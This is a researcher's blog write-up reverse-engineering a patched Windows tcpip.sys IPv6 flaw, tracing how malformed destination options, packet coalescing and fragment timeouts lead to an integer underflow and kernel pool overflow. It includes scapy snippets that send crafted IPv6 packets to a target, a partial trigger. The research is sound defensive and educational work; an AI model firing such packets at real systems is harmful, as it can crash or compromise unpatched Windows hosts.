2024-08-27 14:46:00 Author: malwaretech.com

Since the latest Windows patch dropped on the 13th of August I’ve been deep in the weeds of tcpip.sys (the kernel driver responsible for handling TCP/IP packets). A vulnerability with a 9.8 CVSS score in the most easily reachable part of the Windows kernel was something I simply couldn’t pass up on. I’ve never really looked at IPv6 before (or the drivers responsible for parsing it), so I knew trying to reverse engineer this vulnerability was going to be extremely challenging, but a good learning experience.

For the most part, tcpip.sys is largely undocumented. I was able to find a couple of exploit write-ups for older bugs: here, here, and here, but little else. When the top search result for my English Google search is written in Chinese, I immediately know I’m way out of my depth and in for a bad time, but learn we must. Despite Google Translate doing a mediocre job, the post provided some incredibly detailed insight into how IPv6 fragmentation works, and gave me a good head start.

Later on, while Googling some function names, I came across another analysis of the same 2021 vulnerability, written by Axel Souchet (AKA 0vercl0k), which went even deeper into the internals of tcpip.sys and gave me enough information to define several undocumented structures.

Usually, even just reverse engineering the patch to figure out which code change corresponds to the vulnerability can take days or even weeks, but in this case it was instant. It was so easy in fact, that multiple people on social media told me I was wrong and that the bug was somewhere else. Did I actually listen to them and then waste an entire day reversing the wrong driver? We may never know.

There was exactly one change made in the entire driver file, which it turns out, actually was the bug after all.

A bindiff overview of tcpip.sys before and after installing the patch.

Only a single function in the whole driver has been modified. Typically, I could spend a whole day going through 20+ different function changes just to figure out which is the one I should be looking at, but not this time.

Ipv6pProcessOptions() before the patch.

Ipv6pProcessOptions() after the patch.

Not only was it just a single function that was changed, but a single line of code.

The extremely long-named Feature_2660322619__private_IsEnabledDeviceUsage_3() function is something Microsoft sometimes adds to enable partial patch rollbacks.

The call checks for the presence of a global flag, or registry setting, which if set, will cause the function to return false, resulting in the original code being executed instead of the patched version.

The reason Microsoft does this is because security patches sometimes unintentionally break things, so this setting enables an administrator to unpatch a single vulnerability, without uninstalling the entire monthly patch rollup and drastically weakening their system security.

Taking this into account, it’s clear that all this patch does is replace a call to IppSendErrorList() with IppSendError(), giving us a clue that the issue is with some kind of list. Easiest patch diff ever (or so I thought).
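The gating described above can be modelled roughly as follows. This is a simplified Python sketch rather than the decompiled code: `feature_is_enabled`, `rollback_requested`, and `handle_option_error` are hypothetical names standing in for the Feature_2660322619__private_IsEnabledDeviceUsage_3() check and the code around it.

```python
def feature_is_enabled(rollback_requested):
    # Hypothetical stand-in for the feature check: it returns False
    # when an administrator has asked for this one fix to be rolled back.
    return not rollback_requested


def handle_option_error(packet_list, rollback_requested=False):
    # Returns the name of the function that would be called and the
    # packets it would touch, so both code paths can be compared.
    if feature_is_enabled(rollback_requested):
        # Patched path: only the offending (first) packet is handled.
        return ("IppSendError", packet_list[:1])
    # Original path: every packet in the list is handled.
    return ("IppSendErrorList", packet_list)


print(handle_option_error(["bad-option", "fragment"]))
print(handle_option_error(["bad-option", "fragment"], rollback_requested=True))
```

The only difference between the two paths is how many packets are touched, which is what points at the list handling.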

Reverse engineering the patch to find the altered code is only half of the challenge (or in this case less than 0.1%). The rest of the process consists of reverse engineering enough of the codebase to understand what is even going on, figuring out what kind of vulnerability was patched, how to craft a request to reach the target code, and what state results in an exploitable condition.

The first part is easy enough. The change is in Ipv6pProcessOptions(), which tells us it’s IPv6 and involves processing options. So, a quick call to the RFC tells us exactly what an IPv6 option is and where we can find one.

The destination options header layout from Wikipedia.

Ok, cool. What we’re looking for appears to be the destination options header, which sits directly after the main IPv6 header. Let’s use the Python library ‘scapy’ to craft a test IPv6 packet.

Note: To mitigate DDoS attacks using spoofed IP addresses, Windows restricts the ability to construct raw IP packets. For this reason, I opted to use Linux to develop my proof-of-concept. Whilst Linux does allow users to construct and send raw layer 2 and layer 3 packets, it requires the Python script to be run as root.

import sys
import struct
from scapy.all import *

def send_ipv6_option_packet(dest_ip):
    ethernet_header = Ether()
    ip_header = IPv6(dst=dest_ip)
    options_header = IPv6ExtHdrDestOpt()
    sendp(ethernet_header / ip_header / options_header)

if len(sys.argv) < 2:
    print('Use: python3 script.py <target_ipv6_address>')
    exit(-1)

send_ipv6_option_packet(sys.argv[1])

After setting a breakpoint on tcpip!Ipv6pProcessOptions, then running the script, it was clear that all that was needed to reach the vulnerable function was sending an IPv6 packet with an empty options structure.

I then tried adding some invalid options to the structure to see if I could reach the call to IppSendErrorList().

A brief code review indicated that almost any invalid option formatting could trigger the call to IppSendErrorList. So, I decided on using the Jumbo Packet option with an invalid length (less than 65535 bytes).

options_header = IPv6ExtHdrDestOpt(options=[Jumbo(jumboplen=0x1337)])
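For readers who want to see the bytes involved, here is a scapy-free sketch of what such a header could look like on the wire. It assumes the standard layout from RFC 2675 (option type 0xC2, a 4-byte option body holding a 32-bit length); `build_dest_opts_with_jumbo` is a hypothetical helper name, and the exact bytes scapy emits may differ.

```python
import struct

JUMBO_OPTION_TYPE = 0xC2   # Jumbo Payload option type (RFC 2675)
NO_NEXT_HEADER = 59        # IPv6 'No Next Header' value


def build_dest_opts_with_jumbo(next_header, jumbo_length):
    # Option: type (1 byte), data length (1 byte), 32-bit jumbo payload length.
    option = struct.pack('!BBI', JUMBO_OPTION_TYPE, 4, jumbo_length)
    # Header: Next Header, Hdr Ext Len (0 means 8 bytes in total), then the option.
    header = struct.pack('!BB', next_header, 0) + option
    assert len(header) % 8 == 0, "extension headers are multiples of 8 bytes"
    return header


header = build_dest_opts_with_jumbo(NO_NEXT_HEADER, 0x1337)
print(header.hex())

# A jumbo length must be greater than 65,535, so 0x1337 is invalid.
print(0x1337 > 65535)
```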

So, what does IppSendErrorList() actually do? Well, the code is pretty simple.

The entire IppSendErrorList function.

The code iterates a linked list and calls IppSendError() on every item in the list.

Again, the stars have aligned and things have been easy thus far.

If IppSendErrorList just calls IppSendError for each item in a list, and the patch replaces the call to IppSendErrorList with IppSendError, then the problem occurs when IppSendError is called on a list item other than the first.
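To make that reasoning concrete, here is a toy Python model of the two behaviours. The `Packet` class and both functions are hypothetical simplifications: the real code operates on kernel structures, not Python objects.

```python
class Packet:
    def __init__(self, name, next_packet=None):
        self.name = name
        self.next = next_packet  # singly linked list, None terminates


def send_error(packet, touched):
    # Stand-in for IppSendError(): record which packet was handled.
    touched.append(packet.name)


def send_error_list(head, touched):
    # Stand-in for IppSendErrorList(): walk the list, handle every entry.
    packet = head
    while packet is not None:
        send_error(packet, touched)
        packet = packet.next


# A list where an unrelated packet happens to follow the malformed one.
head = Packet("malformed-option", Packet("unrelated-fragment"))

before_patch, after_patch = [], []
send_error_list(head, before_patch)  # pre-patch behaviour
send_error(head, after_patch)        # post-patch behaviour
print(before_patch, after_patch)
```

Before the patch, the unrelated packet is also passed to the error handler, even though nothing was wrong with it.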

So, what is this a list of, and how do we make one?

This is where things went from obvious to abnormally difficult, though I think a large part of this was due to one of my two available brain cells being preoccupied with fighting a bad covid infection. I lost a couple of days to understanding parts of the code, falling asleep, then forgetting what it was I had figured out. The whole process required over a week of reverse engineering parts of tcpip.sys to figure out what was going on. But Axel’s blog post was extremely helpful.

By looking at the functions and structures Axel reverse engineered, and which other functions they’re passed to, it’s clear that the one and only argument passed to Ipv6pProcessOptions() is the same packet_t structure defined in the article.

Essentially, the pointer passed to Ipv6pProcessOptions, and iterated by IppSendErrorList, is a linked-list of packets.

So, I set a breakpoint on Ipv6pProcessOptions() and inspected the list.

The list->Next entry is NULL.

Every time my breakpoint was hit, the list contained only one packet. I spent way longer than I’d like to admit trying to figure out why and how to get my list to actually be a list. My first thought was IPv6 fragmentation: IPv6 allows senders to split large packets into separate smaller packets, which it would make sense to keep together in a list.

After extensive reverse engineering, I confirmed my assumptions were correct, though the fragment list is not related to the one we’re dealing with here.

I actually ended up finding the answer entirely by accident. Occasionally, the list would populate, but the reason was unclear. After much going round in circles, I realized that when my kernel breakpoint is triggered, it pauses the entire kernel, causing the network adapter to accumulate packets. When the kernel resumes, these packets are passed down the stack to tcpip.sys in a nice neat list. This only occurred if the packets were sent while the kernel was paused, but not processed before the next breakpoint was hit.

This behavior is likely a performance optimization, where at low throughput, the kernel processes packets individually, but at higher volumes, packets are organized into lists and processed in batches. Most likely, lists are separated based on factors such as protocol and source address to speed up processing, so our list should contain only IPv6 packets we sent.
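A toy model of that hypothesis, in Python: whenever the consumer becomes free, it takes every packet that has already arrived as one list. This is only an illustration of the batching idea, not how the Windows network stack is actually implemented; `batch_sizes` and the fixed per-batch `service_time` are assumptions made for the sketch.

```python
def batch_sizes(arrival_times, service_time):
    # arrival_times: sorted arrival timestamps, one per packet.
    # service_time: time the consumer spends on each batch (assumed constant).
    batches = []
    now = 0
    i = 0
    while i < len(arrival_times):
        # If nothing is waiting, idle until the next packet shows up.
        now = max(now, arrival_times[i])
        # Take everything that has arrived by now as a single list.
        j = i
        while j < len(arrival_times) and arrival_times[j] <= now:
            j += 1
        batches.append(j - i)
        now += service_time
        i = j
    return batches


# Slow sender: the consumer always keeps up, so every list has one entry.
print(batch_sizes([0, 10, 20, 30], service_time=1))
# Fast sender (or slow consumer): packets pile up and arrive as a list.
print(batch_sizes([0, 1, 2, 3, 4, 5], service_time=4))
```

In this model, the same effect can be reached either by sending faster or by making the consumer slower, which matches what pausing the kernel at a breakpoint does.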

Now that we know packets are coalesced into lists during high throughput, it’s clear what the easiest option would be.

Our DoS PoC is ironically going to have to use DoS to trigger the DoS condition.

If we flood the system with bursts of IPv6 packets, we should be able to get a nice big list passed to IppSendErrorList().

At first, no matter how many packets I sent, I could still only get the list to contain more than one packet if I paused the kernel. But… since we’re using Python (painfully slow), in a VM (doubly painfully slow), we’re probably going to need to tweak some settings. In order to counteract the VM-ception happening on my attack system, I decided to simply reconfigure the target VM to use only a single CPU core.

Nice! The packet list is now a list containing lots of entries!

So, turns out a VM within a VM isn’t the best option for DoS, who’d have thought? But we made it work in the end.

Now, we just need to figure out what IppSendError() does and in which part the problem lies.

After some extensive reverse engineering, it became much clearer what IppSendError does. Under usual circumstances, it simply disables the packet by setting net_buffer_list->Status to 0xC000021B (STATUS_DATA_NOT_ACCEPTED). Then, it transmits an ICMP error containing information about the erroneous packet back to the sender.

Two relevant parts of IppSendError.

My first port of call was to see if there were any functions in tcpip.sys which ignore the net_buffer_list->Status value. This would result in the driver processing packets that are in an undefined or unexpected state, hopefully leading to an exploit condition.

The main loop responsible for processing packets.

Since the loop responsible for calling all the parsing functions is wrapped in an error check (meaning we can’t go anywhere once the error code is set), I figured this was the wrong rabbit hole to go down. Instead, I decided to go back to IppSendError and see if there are any code paths that modify the packet state prior to setting the error code, which could lead to a race condition.

After a lot more reverse engineering, I found the following code near the very bottom of IppSendError.

A code path in IppSendError which sets the packet_size to zero.

When IppSendErrorList, and thus IppSendError, is called with the argument always_send_icmp set to true, it appears to attempt to send an ICMP error for every packet in the list.

Then, for reasons probably known only to god, it reaches a block of code where the packet->packet_size field gets set to zero.

In order to set always_send_icmp to true, all we need to do is cause a specific error in the options header processing by setting the ‘Option Type’ value to any number larger than 0x80.

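# mac_addr and ip_addr are assumed to hold the target's MAC and IPv6 addresses.
def build_malicious_option(next_header, header_length, option_type, option_length):
    dest_options_header = 60  # IPv6 'Next Header' value for Destination Options
    # Raw header: Next Header, Hdr Ext Len, Option Type, Option Length, then 4 bytes of filler
    options_header = struct.pack('BBBB', next_header, header_length, option_type, option_length) + b'1337'
    return Ether(dst=mac_addr) / IPv6(dst=ip_addr, nh=dest_options_header) / raw(options_header)

packet = build_malicious_option(next_header=59, header_length=0, option_type=0x81, option_length=0)
sendp(packet)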
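As background on why the high bits of the option type matter: RFC 8200 uses the top two bits of an unrecognized option’s type to tell the receiver what to do with the packet. The sketch below decodes those bits. How exactly tcpip.sys maps them onto always_send_icmp is not shown here, and `unrecognized_option_action` is a hypothetical helper name.

```python
# Action for an unrecognized option, keyed by the top two bits of its type
# (RFC 8200, section 4.2).
ACTIONS = {
    0b00: "skip the option and continue processing",
    0b01: "discard the packet silently",
    0b10: "discard the packet and send ICMP Parameter Problem, even for multicast",
    0b11: "discard the packet and send ICMP Parameter Problem unless multicast",
}


def unrecognized_option_action(option_type):
    return ACTIONS[(option_type >> 6) & 0b11]


print(hex(0x81), "->", unrecognized_option_action(0x81))
print(hex(0x3e), "->", unrecognized_option_action(0x3E))
```

With an option type of 0x81, the top two bits are 10, so a conforming receiver is expected to answer with an ICMP error.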

But, shouldn’t setting the packet_size to zero break the parser?



A snippet from the main loop responsible for processing packets.

The packet handler simply calls a VTable function based on the packet->next_header value, which remains unchanged from when it was set during pre-parsing. This allows packet processing to continue and even gives us control over which processing occurs.

Because the packet->next_header value is obtained from the ‘Next Header’ field of the IPv6 packet, we can set it to any valid IPv6 header value, and the loop will call the corresponding parser. This gives us a lot of potential attack surface.
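The dispatch can be pictured as a lookup table keyed by the Next Header value. The Python sketch below is a loose model of that idea: the protocol numbers are the standard IPv6 ones, but `HANDLERS`, `next_parser`, and the dictionary-based packet are hypothetical and do not reflect the real VTable layout.

```python
# Standard IPv6 Next Header values for a few extension headers.
HANDLERS = {
    0: "hop-by-hop options parser",
    43: "routing header parser",
    44: "fragment header parser",
    60: "destination options parser",
}


def next_parser(packet):
    # Only next_header is consulted; packet_size plays no part in the choice.
    return HANDLERS.get(packet["next_header"], "no extension-header parser")


# A packet whose size was zeroed still reaches the parser we choose.
packet = {"next_header": 44, "packet_size": 0}
print(next_parser(packet))
```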

The IPv6 packet format.

All that’s left to do is find a reachable part of the IPv6 parser that does something silly with the packet_size field.

The first place I decided to look was the IPv6 fragment parser, because that’s where the old CVE-2021-24086 vulnerability was, so it seemed like a good place to find more wacky code.

Eh… it’s so close, but also so far.

We do have a vulnerability here, but it’s not an RCE.

Essentially, on most CPUs, registers are circular. If you increment a register past its maximum possible value, it loops back around to zero. Similarly, if you decrement it below its lowest possible value, it loops around to the highest possible value. These are referred to as integer overflows and integer underflows respectively. This behavior is slightly different for signed integers, but we aren’t dealing with those here.

The first line, fragment_size = LOWORD(packet->packet_size) - 0x30, consists of the following ASM code:

The ASM code calculating the fragment size.

AX is the low 16 bits of the EAX register. Although the EAX register is 32 bits wide, AX operates as if it were its own 16-bit register, so any overflows or underflows are confined to AX and won’t affect the rest of the EAX register. This is incredibly convenient, because an underflow on the full EAX register would result in a value of roughly 4 billion, and therefore an attempt to allocate 4GB of memory, which would likely fail.

Since the value of packet->packet_size is zero, this code sets ax to zero, then subtracts 0x30 from it.

Under normal conditions the packet header is 0x30 bytes, so packet_size - 0x30 is the size of the fragment data.

In our case, packet->packet_size is 0, so subtracting even 1 from it will cause the register to loop around to the maximum possible 16-bit integer value (0xFFFF).

Since we’re subtracting 0x30, the value of AX will underflow and become MAX_VALUE - 0x2F, or 0xFFD0, which is 65,488.
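The arithmetic is easy to check in Python by masking results to the register width. Python integers don’t wrap on their own, so the `& 0xFFFF` mask below is what emulates the 16-bit AX register; `sub16` and `sub32` are just illustrative helper names.

```python
def sub16(value, amount):
    # Emulate a subtraction in a 16-bit register such as AX.
    return (value - amount) & 0xFFFF


def sub32(value, amount):
    # Emulate the same subtraction in a 32-bit register such as EAX.
    return (value - amount) & 0xFFFFFFFF


packet_size = 0
fragment_size = sub16(packet_size, 0x30)
print(hex(fragment_size), fragment_size)   # 16-bit result
print(hex(sub32(packet_size, 0x30)))       # what a 32-bit underflow would give
```

The 16-bit result is 0xFFD0 (65,488), while the 32-bit version would be 0xFFFFFFD0, which is the roughly 4 billion figure mentioned earlier.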

Unfortunately, since the same calculation is used for both memory allocation and copying data, we don’t get a buffer overflow.

I believe RtlCopyMdlToBuffer() also performs bounds checking on the source buffer, so we don’t even get an out-of-bounds read either.

However, we don’t come away completely empty-handed.

Because ExAllocatePoolWithTagPriority() doesn’t zero the allocated memory, and RtlCopyMdlToBuffer() only copies the actual amount of data available, we get around 64 KB (65,488 bytes) of uninitialized kernel memory.

Since memory addresses are recycled after deallocation, the buffer is likely to be filled with whatever was previously stored at the address prior to reallocation.
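The effect can be illustrated with a small Python simulation. Nothing here touches real kernel memory: `pool`, `allocate_without_zeroing`, and `copy_available` are hypothetical stand-ins for a recycled pool region, a non-zeroing allocator, and a bounds-checked copy.

```python
def allocate_without_zeroing(pool, size):
    # Hand back a chunk that still holds whatever was there before.
    return bytearray(pool[:size])


def copy_available(dest, source):
    # Copy only as many bytes as the source really has.
    count = min(len(dest), len(source))
    dest[:count] = source[:count]
    return count


pool = bytearray(b"SECRET" * 16)             # stale data from a previous owner
buffer = allocate_without_zeroing(pool, 64)  # oversized allocation
copied = copy_available(buffer, b"frag")     # far less data than the buffer holds

leaked = bytes(buffer[copied:])
print(copied, leaked[:8])
```

Everything after the first `copied` bytes is leftover data, which is why getting the buffer echoed back would leak memory.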

If we can use fragmentation to construct a packet which gets sent back to us, such as an ICMP Echo request, we could potentially leak random kernel memory, leading to an ASLR bypass.

On top of that, the code also sets reassembly->fragment_size to the underflowed 16-bit integer (65,488), so we now have two separate variables that we could potentially use to cause a buffer overflow.

Unfortunately, (or fortunately, as it probably saved me a lot of time), someone beat me to the punch. Before I could find somewhere to use one of the underflowed integers to trigger a buffer overflow, @ynwarcs found the answer and published a PoC. This solves the final piece of my puzzle.

The solution (or at least one of them) is Ipv6pReassemblyTimeout().

Whilst we can’t cause an overflow in the initial fragment handling, we apparently can during cleanup.

IPv6 fragments will stick around in memory until one of three conditions occurs:

- We mess up our fragmentation badly enough that the system tells us it’s time to stop.

- We send a fragment with the ‘More’ field set to 0, which indicates this is the last fragment, and the system will begin reassembly.

- We don’t send the last fragment before the timeout period (60 seconds) expires, and the system drops the fragments.

Ipv6pReassemblyTimeout() gets called under condition 3, so let’s examine how this can be exploited.
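To leave fragments waiting for the timeout, the fragment header’s ‘More’ flag has to stay set. The sketch below builds the 8-byte fragment header following the RFC 8200 layout (Next Header, Reserved, 13-bit offset in 8-byte units plus the M flag, 32-bit Identification). It is a standalone illustration using only `struct`, and `build_fragment_header` is a hypothetical helper name.

```python
import struct

ICMPV6 = 58  # Next Header value for ICMPv6


def build_fragment_header(next_header, offset_units, more_fragments, identification):
    # The 16-bit field packs the fragment offset (upper 13 bits, in units of
    # 8 bytes), two reserved bits, and the M flag in the lowest bit.
    offset_and_flags = (offset_units << 3) | (1 if more_fragments else 0)
    return struct.pack('!BBHI', next_header, 0, offset_and_flags, identification)


# First fragment with M=1: the receiver keeps waiting for more.
first = build_fragment_header(ICMPV6, 0, True, 0x1337)
# A fragment with M=0 would mark the end and start reassembly.
last = build_fragment_header(ICMPV6, 2, False, 0x1337)
print(first.hex(), last.hex())
```

Sending only fragments like `first`, and never one like `last`, is what leaves the reassembly state around until the timeout fires.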

This is exactly what we need!

Previously, our issue was that the code used the exact same calculation for both the memory allocation and the copy operation. This code, on the other hand, doesn’t. Let’s take a deeper look at the ASM to see how it’s exploitable.

The assembly code responsible for calculating the allocation size.

As you can see here, the first part of the calculation (fragment_list->net_buffer_length + reassembly->packet_length + 8) is done using the 16-bit DX register.

If you’ll remember from earlier, we underflowed reassembly->packet_length to be 0xFFD0. So the DX register, after adding the 8 bytes, is 0xFFD8. If fragment_list->net_buffer_length is larger than 0x27 (39 bytes), DX will overflow and reset to zero.

fragment_list->net_buffer_length should be around 0x38 bytes, so it’ll result in overflowing the DX register to 8. After the 0x28 bytes is added, we’ll get a memory allocation of just 48 bytes.

Since the subsequent memmove() call just uses the unadulterated reassembly->packet_length value for its size, it’ll result in 65,488 bytes being copied from reassembly->payload into a 48-byte (0x30) buffer.
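The wraparound threshold can be checked with a few lines of Python. This sketch follows the calculation as described in the text (a 16-bit sum followed by adding 0x28) and is not taken from the disassembly; `allocation_size` is a hypothetical helper and the `& 0xFFFF` mask emulates the DX register.

```python
COPY_LENGTH = 0xFFD0  # the underflowed length later used as the copy size


def allocation_size(net_buffer_length, packet_length=0xFFD0):
    # First part of the calculation happens in a 16-bit register.
    sum16 = (net_buffer_length + packet_length + 8) & 0xFFFF
    # The remaining 0x28 bytes are added afterwards.
    return sum16 + 0x28


for length in (0x27, 0x28):
    size = allocation_size(length)
    print(hex(length), hex(size), "overflow" if COPY_LENGTH > size else "fits")
```

At 0x27 the 16-bit sum is still 0xFFFF and the copy fits. One byte more and the sum wraps to zero, leaving an allocation far smaller than the amount of data being copied.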

A great added bonus is that much of the data copied comes from the fragment payload, which we control, and can be arbitrary data of any format, so we get a nice fairly controllable kernel pool based buffer overflow.

In order to have a chance of triggering the vulnerability, we need to have one or more fragment packets located after the malformed option packet in the linked list at the time IppSendErrorList is called. However, from my testing, this doesn’t appear to guarantee exploitation. I believe that there are also some other conditions which need to be met. I suspect, but haven’t confirmed, that the synchronization code in IppSendError means we also have to win a race condition.

I had wanted to publish a DoS proof-of-concept, but it’s proven extremely difficult to trigger the bug reliably, making it impractical for widespread use. Whilst I was able to get my PoC working using the final piece from ynwarcs, it requires the target system to be deliberately throttled to account for the low throughput capabilities of Python.

I do have a feeling there are probably better and more consistent ways to ensure packet coalescing takes place, possibly by sending specially crafted packets designed to hang up the parser even at low volume… But I’m not sure how much more time I want to spend on this. I’ve already learned a lot, got my PoC working, and written a cool article. So, I think it’s time to call it a day (technically, several weeks, actually), and get back to work.

Anyway, I hope you enjoyed the article and learned something from my research!
